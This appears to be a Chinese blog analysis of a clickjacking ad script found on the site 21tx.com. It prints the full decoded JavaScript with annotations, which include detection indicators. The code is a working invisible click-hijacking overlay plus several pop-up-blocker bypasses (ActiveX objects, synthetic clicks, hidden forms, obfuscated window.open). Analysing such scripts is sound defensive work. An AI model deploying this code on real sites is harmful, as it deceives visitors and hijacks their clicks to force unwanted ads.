天星网ClickJacking点击劫持分析
http://www.21tx.com/ 天星网
我得联系联系作者
刚好打开这个站,发现第一次点击会弹窗,之后就不会了;清除一下COOKIE,又会继续弹窗。然后查看源代码,也没什么奇葩的。
http://www.lxting.com/script/popup/v1_min.js

这个是锁定到的JS脚本,
解密后的代码:
(function() {
// Shared state for the pop-up script. Everything below lives inside one IIFE,
// so these are closure variables, not page globals.

// URL that every technique below opens. It is supplied by the embedding page
// through the global ytpp_url (its definition is not part of this listing).
var aa_url = window.ytpp_url;
var ua = navigator.userAgent;
// Hidden container that form_pop() fills with a form; a_pop() removes it on click.
var form_div = document.createElement('div');
// Set to 1 by form_pop()'s keyup handler; a_pop()'s timer watches it and then
// removes the overlay.
var form_pd = 0;
// User-agent sniffing table. pop() selects a pop-up technique from these flags.
var browser = {
  ie: /msie/i.test(ua),
  ie6: /msie 6/i.test(ua),
  ie7: /msie 7/i.test(ua),
  ie8: /msie 8/i.test(ua),
  ie9: /msie 9/i.test(ua),
  360 : /360se/i.test(ua),
  sogou: /;?se.+?MetaSr/i.test(ua),
  maxthon: /Maxthon/i.test(ua),
  tt: /TencentTraveler/i.test(ua),
  ff: /firefox/i.test(ua),
  webkit: /AppleWebKit/i.test(ua),
  opera: /Opera/i.test(ua),
  qqbrowser: /QQBrowser/i.test(ua),
  cr: /chrome/i.test(ua),
  // Not a regex test: truthy only when the window.chrome object exists.
  gg: window.chrome,
  theworld: /Theworld/i.test(ua)
};
// Behaviour settings. init() overwrites most of them from the ytpp_sti string
// (keys CT, LE, PD2, PC2, PCO, PT..PT10, PO, POO). _pd and _pc keep these
// defaults unless init() zeroes them; _pc is not read anywhere in this listing.
var _setting = "";
var _ct = 0;   // cookie lifetime in minutes; its sign selects the cookie name (see fstart)
var _le = 0;   // start delay in seconds (see fstart)
var _pd = 1;   // 1 = always schedule pop() (see go)
var _pd2 = 0;  // compared with Math.random() in go()
var _pc = 1;
var _pc2 = 1;  // compared with Math.random() in go() before a_pop()
var _pco = 0;  // 1 = overlay-only mode (see init/go)
// _ptNa / _ptNb are the two comma-separated fields of setting PT<N>:
// go() uses "a" as a delay in seconds and compares "b" with Math.random().
var _pta = 0;
var _ptb = 0;
var _pt2a = 0;
var _pt2b = 0;
var _pt3a = 0;
var _pt3b = 0;
var _pt4a = 0;
var _pt4b = 0;
var _pt5a = 0;
var _pt5b = 0;
var _pt6a = 0;
var _pt6b = 0;
var _pt7a = 0;
var _pt7b = 0;
var _pt8a = 0;
var _pt8b = 0;
var _pt9a = 0;
var _pt9b = 0;
var _pt10a = 0;
var _pt10b = 0;
var _po = 0;   // compared with Math.random() in go() before a direct window.open
var _poo = 0;  // 1 = window.open-only mode (see init/go)
// Cookie name and lifetime (minutes) of the pop-up counter; assigned in fstart().
var ckn, ckt;
// Number of pop-ups counted so far; persisted in the ckn cookie by p().
var ads = 0;
/**
 * Read a cookie value.
 * @param {string} w - cookie name
 * @returns {string} the unescaped value, or "" when the cookie is not found
 */
function b(w) {
  var s = w + "=";
  var r = "";
  var o = 0;
  var d = 0;
  // Unused: the code below reads document.cookie directly.
  var p = document.cookie;
  if (document.cookie.length > 0) {
    // Plain substring search: the first "w=" anywhere in the cookie string wins.
    o = document.cookie.indexOf(s);
    if (o != -1) {
      o += s.length;
      d = document.cookie.indexOf(";", o);
      // Last cookie in the string has no trailing ";".
      if (d == -1) d = document.cookie.length;
      r = unescape(document.cookie.substring(o, d))
    }
  }
  return r
};
/**
 * Write a site-wide cookie (path=/). The script uses it to persist the pop-up
 * counter `ads` under the name held in `ckn`.
 * @param {string} w - cookie name
 * @param {*} p - lifetime in minutes; falls back to 30 when it does not parse as a number
 * @param {*} v - value, written without escaping
 */
function p(w, p, v) {
  var t = 30;
  try {
    t = parseFloat(p) * 1
  } catch(e) {
    t = 30
  }
  if (isNaN(t)) t = 30;
  var then = new Date();
  // A lifetime of 0 yields an expiry of "now", i.e. the cookie is not kept.
  then.setTime(then.getTime() + t * 60 * 1000);
  document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'
};
/**
 * Load the behaviour settings from the global ytpp_sti string into the closure
 * variables. ytpp_sti is defined outside this listing; getp() parses it as
 * "KEY:value;" pairs, so every value stored here is a string.
 */
function init() {
  _setting = ytpp_sti;
  if (getp(_setting, "CT")) {
    _ct = getp(_setting, "CT")
  }
  if (getp(_setting, "LE")) {
    _le = getp(_setting, "LE")
  }
  if (getp(_setting, "PD2")) {
    _pd2 = getp(_setting, "PD2")
  }
  if (getp(_setting, "PC2")) {
    _pc2 = getp(_setting, "PC2")
  }
  if (getp(_setting, "PCO")) {
    _pco = getp(_setting, "PCO")
  }
  // Settings PT, PT2 .. PT10 each hold "a,b"; split them into _ptNa / _ptNb.
  for (var i = 1; i <= 10; i++) {
    var n = i == 1 ? "": i;
    if (getp(_setting, "PT" + n)) {
      // eval only synthesises the variable names: the evaluated source is built
      // from the loop index, the setting value itself is not interpolated into it.
      eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');");
      eval("_pt" + n + "a = _pt" + n + "[0];");
      eval("_pt" + n + "b = _pt" + n + "[1];")
    }
  }
  if (getp(_setting, "PO")) {
    _po = getp(_setting, "PO")
  }
  if (getp(_setting, "POO")) {
    _poo = getp(_setting, "POO")
  }
  // PCO and POO are exclusive modes: when either is 1, every other technique
  // is switched off, and POO takes precedence over PCO.
  if (_pco == 1 || _poo == 1) {
    if (_poo == 1) {
      _pco = 0
    } else {
      _poo = 0
    }
    _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0;
    for (var i = 2; i <= 10; i++) {
      eval("_pt" + i + "a = _pt" + i + "b = 0;")
    }
  }
};
/**
 * Extract one value from a "KEY:value;KEY:value;" settings string.
 * @param {string} s - settings string
 * @param {string} p - key to look up
 * @returns {string|undefined} text between "p:" and the next ";", or undefined
 *   when "p:" does not occur in s
 */
function getp(s, p) {
  var i = s.indexOf(p + ":");
  if (i >= 0) {
    // Start just after "p:"; length = distance to the next ";" minus the "p:" prefix.
    return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1)
  }
};
/**
 * Add or remove an event listener, using attachEvent/detachEvent when the
 * user agent was sniffed as IE and addEventListener/removeEventListener otherwise.
 * @param {Object} e - event target
 * @param {string} event - event name without the "on" prefix
 * @param {Function} func - handler
 * @param {*} [act] - leave undefined to add the handler; pass any value to remove it
 */
function event(e, event, func, act) {
  if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func);
  else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false)
}
/**
 * Dispatcher: picks a pop-up technique from the sniffed `browser` flags and
 * falls back to another one when the first throws or returns a falsy value.
 * The techniques are hrefopen, func (window.open), form_pop, object_pop,
 * object_pop2, click_pop and a_pop.
 * @param {string} url - URL to open
 * @param {Object} [param] - only forwarded to the retry below; the callers in
 *   this listing pass {a: 1, b: 2}
 */
function pop(url, param) {
  // The techniques insert nodes into <body>; poll every 13 ms until it exists.
  if (!document.body) {
    return setTimeout(function() {
      pop(url, param)
    },
    13)
  }
  try {
    // Chrome: UA matches /chrome/ and window.chrome exists.
    if (browser['cr'] && browser['gg']) {
      try {
        // hrefopen() catches its own errors and returns false, so as written
        // the a_pop fallback is only reached if hrefopen itself is missing.
        hrefopen(url)
      } catch(e) {
        a_pop(url)
      }
    } else if (browser['webkit'] && browser['maxthon']) {
      if (!func(url)) {
        try {
          form_pop(url);
          a_pop(url)
        } catch(e) {}
      }
    } else if (browser['tt']) {
      try {
        object_pop(url)
      } catch(e) {
        a_pop(url)
      }
    } else if (browser['sogou']) {
      if (!func(url)) {
        try {
          a_pop(url)
        } catch(e) {}
      }
    } else if (browser['webkit'] && browser['qqbrowser']) {
      if (!func(url)) {
        try {
          form_pop(url)
        } catch(e) {
          click_pop(url)
        }
      }
    } else if (browser['webkit'] || browser['opera']) {
      try {
        form_pop(url);
        a_pop(url)
      } catch(e) {}
    } else if (browser['theworld'] && browser.ie6) {
      // object_pop2() has no return value, so this condition is always true and
      // a_pop() is installed as well.
      if (!object_pop2(url)) {
        a_pop(url)
      }
    } else if (browser['theworld'] && browser.ie8) {
      if (!func(url)) {
        try {
          object_pop(url)
        } catch(e) {
          click_pop(url)
        }
      }
    } else if (browser.ie6) {
      if (!func(url)) {
        object_pop2(url)
      }
    } else if (browser.ie8) {
      if (!func(url)) {
        try {
          object_pop(url)
        } catch(e) {
          // One-shot handler: the next click anywhere in the document opens
          // the URL, then the handler removes itself.
          document.onclick = function() {
            func(url);
            document.onclick = null
          }
        }
      }
    } else if (browser['ie']) {
      try {
        object_pop(url)
      } catch(e) {
        click_pop(url)
      }
    } else if (browser['ff']) {
      if (!func(url)) {
        click_pop(url)
      }
    } else {
      if (!func(url)) {
        click_pop(url)
      }
    }
  } catch(e) {
    // Last resort when the chosen branch threw: wait for a mouse-up
    // (click_pop) or install the invisible overlay (a_pop).
    if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) {
      click_pop(url)
    } else {
      a_pop(url)
    }
  }
}
/**
 * Open `url` through an embedded ActiveX object instead of window.open, then
 * count the pop-up in the cookie. Throws when the object cannot be created or
 * has no launchURL method; pop() relies on that to fall back.
 * Analysis note: a 1x1 <object> with this classid inserted at the top of
 * <body> is a usable indicator for this script.
 * @param {string} url - URL to open
 * @param {*} [param] - unused
 */
function object_pop(url, param) {
  var object = document.createElement('object');
  // NOTE(review): this classid is, as far as I know, the Windows Media Player
  // ActiveX control, whose launchURL method opens a URL in the browser - confirm.
  object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6');
  // 1x1 px so the control is effectively invisible on the page.
  object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;';
  append(object);
  object.launchURL(url);
  ads++;
  p(ckn, ckt, ads)
}
/**
 * Variant of object_pop() used on the IE6 branches of pop(): opens `url` from
 * the script window of an embedded ActiveX object after a 500 ms delay.
 * It has no return value, and the counter is incremented immediately, before
 * the delayed open has run (and whether or not it succeeds).
 * @param {string} url - URL to open
 * @param {*} [param] - unused
 */
function object_pop2(url, param) {
  var object2 = document.createElement('object');
  // NOTE(review): this classid is, as far as I know, the "safe for scripting"
  // DHTML Editing ActiveX control - confirm.
  object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A');
  object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;';
  append(object2);
  // Reads every property of the object and discards it; the purpose is not
  // evident from this listing (presumably forces the control to initialise).
  for (var i in object2) {
    try { (function(o) {})(object2[i])
    } catch(e) {}
  }
  setTimeout(function() {
    object2.DOM.Script.open(url, '_blank', '')
  },
  500);
  ads++;
  p(ckn, ckt, ads)
}
/**
 * Insert a node as the first child of the first <body> element.
 * The for-in over the literal {body: 1} only yields the tag name "body";
 * the inner loop returns after the first match. Does nothing when no
 * <body> exists yet.
 * @param {Node} e - node to insert
 */
function append(e) {
  for (var t in {
    body: 1
  }) {
    var ele = document.getElementsByTagName(t);
    for (var i = 0; i < ele.length; i++) {
      ele[i].insertBefore(e, ele[i].firstChild);
      return
    }
  }
}
/**
 * Open `url` by dispatching a synthetic click on a detached, hidden
 * <a target="_blank"> element, then count the pop-up in the cookie.
 * The anchor is never inserted into the document.
 * @param {string} url - URL to open
 * @returns {boolean} true when no step threw, false otherwise (this is not
 *   proof that a window actually opened)
 */
function hrefopen(url) {
  try {
    var c = document.createElement("a");
    c.setAttribute("href", url);
    c.setAttribute("target", "_blank");
    c.setAttribute("style", "display:none;");
    // Local `b` shadows the cookie reader b() inside this function only.
    var b = document.createEvent("MouseEvents");
    // The tenth argument (ctrlKey) is true: the synthetic event is a Ctrl+click.
    b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null);
    c.dispatchEvent(b);
    ads++;
    p(ckn, ckt, ads);
    return true
  } catch(q) {
    return false
  }
}
/**
 * Open the ad URL by submitting a hidden POST form with target="_blank".
 * The form's action is the closure variable aa_url; the `url` parameter is
 * not used. This function does not increment `ads` itself.
 * Analysis note: the element ids/names "__unionsky_push_d_object_box__",
 * "__unionsky_push_d_form_box__" and "_sumit_2app" are stable indicators
 * of this script in a page's DOM.
 * @param {string} url - unused
 */
function form_pop(url) {
  form_div.setAttribute('id', '__unionsky_push_d_object_box__');
  form_div.setAttribute('style', 'display:none');
  var form = document.createElement('form');
  form.setAttribute('action', aa_url);
  form.setAttribute('method', 'post');
  form.setAttribute('name', '__unionsky_push_d_form_box__');
  form.setAttribute('target', '_blank');
  form.setAttribute('style', 'display:none');
  var sinput = document.createElement('input');
  sinput.setAttribute('style', 'display:none');
  sinput.setAttribute('type', 'submit');
  sinput.setAttribute('id', '_sumit_2app');
  form.appendChild(sinput);
  form_div.appendChild(form);
  append(form_div);
  var unionsky_from = document.forms["__unionsky_push_d_form_box__"];
  try {
    // Script-initiated click on the hidden submit button.
    document.getElementById("_sumit_2app").click()
  } catch(e) {
    // Fallback: submit on the user's next key release instead.
    event(document, 'keyup',
    function(e) {
      // a_pop()'s click handler removes the container; nothing left to submit.
      if (document.getElementById('__unionsky_push_d_object_box__') == null) {
        return
      };
      e = e || window.event;
      // "canceBubble" is misspelled in the original, so this only sets an
      // unused property and does not stop propagation.
      e.canceBubble = true;
      // One-shot: detach this handler before submitting.
      event(document, 'keyup', arguments.callee, true);
      // Signals a_pop()'s timer to remove the overlay.
      form_pd = 1;
      unionsky_from.submit()
    })
  }
};
/**
 * Defer the pop-up to the user's next mouse-up anywhere in the document, so
 * that window.open runs inside a user-initiated event handler.
 * Note that `ads` is incremented here and again inside func() when the window
 * opens, so one successful pop-up through this path counts twice.
 * @param {string} url - URL to open
 * @param {*} [param] - forwarded to func(), which ignores it
 */
function click_pop(url, param) {
  event(document, 'mouseup',
  function(e) {
    e = e || window.event;
    // Misspelled "cancelBubble": has no effect on propagation.
    e.canceBubble = true;
    // One-shot: detach this handler.
    event(document, 'mouseup', arguments.callee, true);
    func(url, param);
    ads++;
    p(ckn, ckt, ads)
  })
};
/**
 * The click-hijacking overlay: covers the viewport with a fully transparent
 * <a href=url target="_blank"> at the maximum z-index, so the user's next
 * click on the page lands on the link and opens `url` in a new window as a
 * genuine user navigation. The overlay removes itself after that click.
 * Analysis note: an anchor that is the first child of <body> with opacity 0,
 * z-index 2147483647 and a child <div> resized to the viewport every 120 ms
 * is the visible DOM footprint of this function.
 * @param {string} url - URL the overlay links to
 */
function a_pop(url) {
  // Placement id 166028 is exempt from the overlay (ytpp_plid is a page
  // global defined outside this listing).
  if (ytpp_plid == 166028) {
    return
  }
  // Needs <body>; poll every 13 ms until it exists.
  if (!document.body) {
    return setTimeout(function() {
      a_pop(url)
    },
    13)
  }
  var a = document.createElement("a");
  a.href = url;
  a.target = "_blank";
  // The inner div gives the anchor its clickable area; it is sized in the timer below.
  var div = document.createElement('div');
  div.style.backgroundColor = '#fff';
  a.appendChild(div);
  append(a);
  var as = a.style;
  as.position = "absolute";
  as.zIndex = '2147483647';
  as.display = "block";
  as.top = "0px";
  as.left = "0px";
  // Default cursor, so hovering the overlay does not show the link pointer.
  as.cursor = 'default';
  // Fully transparent (standard property plus the legacy IE filter).
  as.opacity = "0";
  as.filter = "alpha(opacity:0)";
  // Every 120 ms: keep the overlay on top and aligned with the viewport.
  var m = setInterval(function() {
    // form_pop()'s keyup path already submitted the form: remove the overlay.
    if (form_pd == 1) {
      a.parentNode.removeChild(a);
      clearInterval(m);
      return
    }
    a.style.zIndex = '2147483647';
    var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body;
    // Follow scrolling and match the current viewport size.
    a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px';
    div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px';
    div.style.height = d.clientHeight + 'px';
    if (browser['ie']) {
      try {
        // Demote any other direct child of <body> that also claims the
        // maximum z-index, so the overlay stays topmost.
        var divs = document.body.childNodes;
        for (var i = 0; i < divs.length; i++) {
          if (!divs[i]['style']) {
            continue
          }
          var _i = parseInt(divs[i].style.zIndex);
          if (_i && divs[i] != a && _i == 2147483647) {
            divs[i].style.zIndex = _i - 1
          }
        }
        a.style.zIndex = '2147483647'
      } catch(e) {}
    }
  },
  120);
  // Runs on the hijacked click; the browser then follows the link itself.
  a.onclick = function(e) {
    // Drop the pending form_pop() form so the URL is not opened twice.
    if (document.getElementById('__unionsky_push_d_object_box__') != null) {
      form_div.parentNode.removeChild(form_div)
    }
    e = e || window.event;
    e.cancelBubble = true;
    // Remove the overlay shortly after the click has been processed.
    setTimeout(function() {
      a.parentNode.removeChild(a)
    },
    200);
    clearInterval(m);
    ads++;
    p(ckn, ckt, ads)
  };
  // Sets the legacy IE cancelBubble flag on mouse-up over the overlay.
  event(a, 'mouseup',
  function(e) {
    e = e || window.event;
    e.cancelBubble = true
  })
}
/**
 * Open `url` in a new screen-sized window via window.open and count it in the
 * cookie when a window handle comes back.
 * @param {string} url - URL to open
 * @param {*} [param] - unused
 * @returns {Window|null|undefined} whatever window.open returned; callers
 *   treat a falsy value as "blocked" and try another technique
 */
function func(url, param) {
  // Char codes 111,112,101,110 spell "open": this is window.open, written so
  // the literal "window.open" does not appear in the script text.
  var f = window[String.fromCharCode(111, 112, 101, 110)];
  var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height);
  if (w) {
    ads++;
    p(ckn, ckt, ads)
  };
  return w
}
/**
 * Entry logic: load the settings, apply the cookie-based frequency cap, then
 * start the pop-up techniques through go().
 * The cap is why the pop-up stops after it has fired and comes back once the
 * site's cookies are cleared: the counter lives in the cookie YITIAN_NUM or
 * YITIAN_ALL.
 * @param {string} url - URL to open
 */
function fstart(url) {
  init();
  // CT >= 0: counter cookie YITIAN_NUM, lifetime CT minutes.
  // CT <  0: counter cookie YITIAN_ALL, lifetime |CT| minutes.
  if (_ct >= 0) {
    ckn = "YITIAN_NUM";
    ckt = _ct
  } else {
    ckn = "YITIAN_ALL";
    ckt = Math.abs(_ct)
  }
  // Restore the counter from the cookie, if one exists.
  if (ckt > 0) {
    if (b(ckn)) {
      try {
        ads = parseFloat(b(ckn))
      } catch(q) {}
    }
  }
  // Stop when YITIAN_ALL records any earlier pop-up, or when the count has
  // reached the page-level limit ytpp_ads (defined outside this listing).
  if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) {
    return
  } else {
    if (_le > 0) {
      // As written, go(url) is called immediately and its (undefined) return
      // value is what setTimeout receives, so the LE delay is not applied.
      setTimeout(go(url), _le * 1000)
    } else {
      go(url)
    }
  }
}
/**
 * Start the configured techniques for `url`.
 * - POO == 1: window.open only.
 * - PCO == 1: invisible click overlay only.
 * - otherwise: every enabled technique runs independently; the fractional
 *   settings (PD2, PT<N> "b", PC2, PO) are compared with Math.random(), so
 *   they act as per-page-view probabilities.
 * @param {string} url - URL to open
 */
function go(url) {
  if (_poo == 1) {
    try {
      func(url)
    } catch(q) {}
  } else if (_pco == 1) {
    a_pop(url)
  } else {
    // _pd defaults to 1 and is not read from the settings, so outside the two
    // exclusive modes pop() is always scheduled 300 ms after start.
    if (_pd == 1) {
      setTimeout(function() {
        pop(url, {
          a: 1,
          b: 2
        })
      },
      300)
    }
    if (_pd2 > Math.random()) {
      setTimeout(function() {
        pop(url, {
          a: 1,
          b: 2
        })
      },
      300)
    }
    // Up to ten additional, delayed pop() calls: PT<N> = "delaySeconds,probability".
    for (var i = 1; i <= 10; i++) {
      var n = i == 1 ? "": i;
      // eval is only used to address _ptNb / _ptNa by name; the evaluated
      // source is built from the loop index.
      if (eval("_pt" + n + "b") > Math.random()) {
        setTimeout(function() {
          setTimeout(function() {
            pop(url, {
              a: 1,
              b: 2
            })
          },
          300)
        },
        parseInt(eval("_pt" + n + "a")) * 1000)
      }
    }
    // _pc2 defaults to 1, so the overlay is installed unless PC2 lowers it.
    if (_pc2 > Math.random()) {
      a_pop(url)
    }
    if (_po > Math.random()) {
      try {
        func(url)
      } catch(q) {}
    }
  }
};
// Runs as soon as the script is loaded: apply the frequency cap and start the
// pop-up techniques for the page-supplied URL.
fstart(aa_url);
// Registers an empty beforeunload handler; it does nothing itself and its
// purpose is not evident from this listing.
event(window, 'beforeunload',
function() {})
})();
通过浏览器抓包,URL从这里产生:

http://play.unionsky.cn/show/?placeid=141830